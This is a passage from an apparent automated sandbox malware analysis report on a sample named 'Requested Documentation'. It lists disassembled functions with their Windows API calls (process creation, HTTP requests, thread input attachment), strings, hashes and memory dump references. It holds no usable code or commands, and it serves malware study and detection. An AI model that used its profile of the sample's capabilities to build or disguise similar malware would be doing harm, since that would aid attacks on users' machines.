                                                                              • WSACleanup.WSOCK32 ref: 009F58F3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: a8d7fa2dae45e1e8f4089a4ee68fb3a9fcae185d22a41352ac36d14b992cbe92
                                                                              • Instruction ID: 85c728a162b2bd46f6d3b32399fa0a2a3f633685cadf513fb80ebf6174432e9e
                                                                              • Opcode Fuzzy Hash: a8d7fa2dae45e1e8f4089a4ee68fb3a9fcae185d22a41352ac36d14b992cbe92
                                                                              • Instruction Fuzzy Hash: AE519E31600704DFDB20EF64DC45B3A77E4AF88750F058929FA56EB2A1DB30E805CB42
                                                                              Function 009EB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009EB4D0
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009EB546
                                                                              • GetLastError.KERNEL32 ref: 009EB550
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 009EB5BD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: fe51085506c79832a036e035dbee313d4892e8242e69387da08f0647e6b6d0b5
                                                                              • Instruction ID: 1e7f4a6219ec644030dfcfe311b77fc28c74985836806ad211db7c29b4101575
                                                                              • Opcode Fuzzy Hash: fe51085506c79832a036e035dbee313d4892e8242e69387da08f0647e6b6d0b5
                                                                              • Instruction Fuzzy Hash: 40319C35A00249AFCB11EFA9C885ABEBBB8FF48310F144526F505A7291DF759E42CB81
                                                                              Function 009D8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009D9014
                                                                              • GetDlgCtrlID.USER32 ref: 009D901F
                                                                              • GetParent.USER32 ref: 009D903B
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 009D903E
                                                                              • GetDlgCtrlID.USER32(?), ref: 009D9047
                                                                              • GetParent.USER32(?), ref: 009D9063
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9066
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 95426019835b6936d5e218234bf1c8c0a755ebbb8447f9fc555836e91751a551
                                                                              • Instruction ID: dee751ca59e211b78560518223b5884af4614340ce695b6f242cbef42f3ffdad
                                                                              • Opcode Fuzzy Hash: 95426019835b6936d5e218234bf1c8c0a755ebbb8447f9fc555836e91751a551
                                                                              • Instruction Fuzzy Hash: 5B21B274A40108BFDF14EBA0CC85EBEBB79EF85310F504216B921972A1DB76981ADB20
                                                                              Function 009D907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009D90FD
                                                                              • GetDlgCtrlID.USER32 ref: 009D9108
                                                                              • GetParent.USER32 ref: 009D9124
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9127
                                                                              • GetDlgCtrlID.USER32(?), ref: 009D9130
                                                                              • GetParent.USER32(?), ref: 009D914C
                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 009D914F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 1536045017-1403004172
                                                                              • Opcode ID: 7e1e2e134ddf090d59030ba787eacac5e39c7de7b47aff3c1c4c663a73f14acf
                                                                              • Instruction ID: 84e50d4525712f3843ae15da6b4fd5b594b73a448de7b98c35b5400048613ff8
                                                                              • Opcode Fuzzy Hash: 7e1e2e134ddf090d59030ba787eacac5e39c7de7b47aff3c1c4c663a73f14acf
                                                                              • Instruction Fuzzy Hash: 1921B074A40108BBDF10ABA0CC85BFEBB78EB48300F504116B911A73A1DB76881ADB20
                                                                              Function 009D9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetParent.USER32 ref: 009D916F
                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 009D9184
                                                                              • _wcscmp.LIBCMT ref: 009D9196
                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009D9211
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameParentSend_wcscmp
                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                              • API String ID: 1704125052-3381328864
                                                                              • Opcode ID: f8d2840677042fa3bc0f2c5d9fbb63e9d2424232f2778fd0ea890d3b5f168ff0
                                                                              • Instruction ID: 805935b55f396de7cab4f5e7af98203980ea2d6c6853375e522af6e834c4c250
                                                                              • Opcode Fuzzy Hash: f8d2840677042fa3bc0f2c5d9fbb63e9d2424232f2778fd0ea890d3b5f168ff0
                                                                              • Instruction Fuzzy Hash: C9110A762CC30BB9FA213728DC06EA7379CAB16720F204527FA14F55D1EE61A8525594
                                                                              Function 009F88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 009F88D7
                                                                              • CoInitialize.OLE32(00000000), ref: 009F8904
                                                                              • CoUninitialize.OLE32 ref: 009F890E
                                                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 009F8A0E
                                                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 009F8B3B
                                                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A12C0C), ref: 009F8B6F
                                                                              • CoGetObject.OLE32(?,00000000,00A12C0C,?), ref: 009F8B92
                                                                              • SetErrorMode.KERNEL32(00000000), ref: 009F8BA5
                                                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009F8C25
                                                                              • VariantClear.OLEAUT32(?), ref: 009F8C35
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                              • String ID:
                                                                              • API String ID: 2395222682-0
                                                                              • Opcode ID: 4f5330b1ba4b47081e00dea8e41e21ba565faf3cf59e4d6b201e656cc46cd927
                                                                              • Instruction ID: d8687d368de9e5489b20024b7f710165e7843dfdb46e8ad2fb5de5e16373d58f
                                                                              • Opcode Fuzzy Hash: 4f5330b1ba4b47081e00dea8e41e21ba565faf3cf59e4d6b201e656cc46cd927
                                                                              • Instruction Fuzzy Hash: 67C137B1608309AFC740DF64C884A6BB7E9FF89348F00495DFA899B251DB71ED46CB52
                                                                              Function 009E7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 009E7A6C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafeVartype
                                                                              • String ID:
                                                                              • API String ID: 1725837607-0
                                                                              • Opcode ID: af493c2767caa8c4b16fc3b6a5565e06835365406d13ee0807229a821e76be5d
                                                                              • Instruction ID: 9c98c74df9ad2de550c7d7a5b90a28fa0af0c297fd10b231cb4b26ad72c40502
                                                                              • Opcode Fuzzy Hash: af493c2767caa8c4b16fc3b6a5565e06835365406d13ee0807229a821e76be5d
                                                                              • Instruction Fuzzy Hash: DEB19E7190424A9FDB12DFE5C884BBEB7B8EF49320F244469EA41EB341D734AD41CB92
                                                                              Function 009E11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 009E11F0
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E1204
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 009E120B
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E121A
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 009E122C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E1245
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E1257
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E129C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E12B1
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E12BC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 699f320aff378938b0bd8448f94e3107bf8c18224bcbf32c34c5138cbebbc822
                                                                              • Instruction ID: 633c0cde0f44d79d0e9a2d33c26c3d44729546049ca9e1d9dc892846b2e20511
                                                                              • Opcode Fuzzy Hash: 699f320aff378938b0bd8448f94e3107bf8c18224bcbf32c34c5138cbebbc822
                                                                              • Instruction Fuzzy Hash: 21310179600348FFDB22DF91EC88FA937ADEB96311F104125FE10D62A0D7759D868B61
                                                                              Function 0098FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0098FAA6
                                                                              • OleUninitialize.OLE32(?,00000000), ref: 0098FB45
                                                                              • UnregisterHotKey.USER32(?), ref: 0098FC9C
                                                                              • DestroyWindow.USER32(?), ref: 009C45D6
                                                                              • FreeLibrary.KERNEL32(?), ref: 009C463B
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C4668
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 469580280-3243417748
                                                                              • Opcode ID: 2580f2f01c4558e6bdcc5d19da7b2447e2543e4dad57cc9cdd8d571ae8f0df46
                                                                              • Instruction ID: 3185dcd23638fb37f3bd41a335032de653186798e5e986f48b7a4ac879e008d2
                                                                              • Opcode Fuzzy Hash: 2580f2f01c4558e6bdcc5d19da7b2447e2543e4dad57cc9cdd8d571ae8f0df46
                                                                              • Instruction Fuzzy Hash: 54A15834B01212CFCB29EF14C9A5F69F368AF45710F5546ADE80AAB261DB30AD16CF91
                                                                              Function 009DA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnumChildWindows.USER32(?,009DA439), ref: 009DA377
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ChildEnumWindows
                                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                              • API String ID: 3555792229-1603158881
                                                                              • Opcode ID: a8d7cead0b86b75dbd34b252c008ca8c377273ab8861e7bc2b3628441c537241
                                                                              • Instruction ID: 00b0ddf5241b00a9cc31bc921c6a157511d6e8cfe32b4488e9c17196a502af7d
                                                                              • Opcode Fuzzy Hash: a8d7cead0b86b75dbd34b252c008ca8c377273ab8861e7bc2b3628441c537241
                                                                              • Instruction Fuzzy Hash: E891E830A44605ABCB08EFA0C441BEDFB79BF85304F54C51AE959A7341DF31AAA9CBD1
                                                                              Function 00982E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00982EAE
                                                                                • Part of subcall function 00981DB3: GetClientRect.USER32(?,?), ref: 00981DDC
                                                                                • Part of subcall function 00981DB3: GetWindowRect.USER32(?,?), ref: 00981E1D
                                                                                • Part of subcall function 00981DB3: ScreenToClient.USER32(?,?), ref: 00981E45
                                                                              • GetDC.USER32 ref: 009BCD32
                                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009BCD45
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009BCD53
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 009BCD68
                                                                              • ReleaseDC.USER32(?,00000000), ref: 009BCD70
                                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009BCDFB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                              • String ID: U
                                                                              • API String ID: 4009187628-3372436214
                                                                              • Opcode ID: 2d018c629de8ffc698af5335b32549da0b2464951a44c8804b85591012d95f4a
                                                                              • Instruction ID: 9c482138d07e62e267663d89819ef601411b5b5331172c682441e81b1167ba39
                                                                              • Opcode Fuzzy Hash: 2d018c629de8ffc698af5335b32549da0b2464951a44c8804b85591012d95f4a
                                                                              • Instruction Fuzzy Hash: 2971E375500209DFCF21DF64C984AEA7FB9FF89320F14467AED555A2A6C7318C82DB60
                                                                              Function 009F1A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009F1A50
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 009F1A7C
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 009F1ABE
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 009F1AD3
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009F1AE0
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 009F1B10
                                                                              • InternetCloseHandle.WININET(00000000), ref: 009F1B57
                                                                                • Part of subcall function 009F2483: GetLastError.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F2498
                                                                                • Part of subcall function 009F2483: SetEvent.KERNEL32(?,?,009F1817,00000000,00000000,00000001), ref: 009F24AD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 2603140658-3916222277
                                                                              • Opcode ID: 8331d8d38a8688a757b92f440a6bc0c88393720a6af53288ffdb6e2d81f11692
                                                                              • Instruction ID: 5695a2ac484b716dc0198f0fb0b04aea7866033495b64d00658bb8e2d39483f5
                                                                              • Opcode Fuzzy Hash: 8331d8d38a8688a757b92f440a6bc0c88393720a6af53288ffdb6e2d81f11692
                                                                              • Instruction Fuzzy Hash: F5416CB150121CFFEB118F50CC89FBA7BACEB08355F00412AFA05AA155E7B59E458BE5
                                                                              Function 009F8C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00A0F910), ref: 009F8D28
                                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00A0F910), ref: 009F8D5C
                                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009F8ED6
                                                                              • SysFreeString.OLEAUT32(?), ref: 009F8F00
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                              • String ID:
                                                                              • API String ID: 560350794-0
                                                                              • Opcode ID: 8adf39d1affcf5a75f677aa5b8257b2174044aa372c89f052d9a0f42c1be1543
                                                                              • Instruction ID: aec6b7569a862b353dbea1fab9d6d601c1d4352c08bd4399e35a0e277c97f140
                                                                              • Opcode Fuzzy Hash: 8adf39d1affcf5a75f677aa5b8257b2174044aa372c89f052d9a0f42c1be1543
                                                                              • Instruction Fuzzy Hash: 5AF11971A00209AFDF54EF94C884EBEB7B9FF89314F148458FA15AB251DB31AE46CB50
                                                                              Function 009FF694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009FF6B5
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FF848
                                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 009FF86C
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FF8AC
                                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009FF8CE
                                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009FFA4A
                                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 009FFA7C
                                                                              • CloseHandle.KERNEL32(?), ref: 009FFAAB
                                                                              • CloseHandle.KERNEL32(?), ref: 009FFB22
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                              • String ID:
                                                                              • API String ID: 4090791747-0
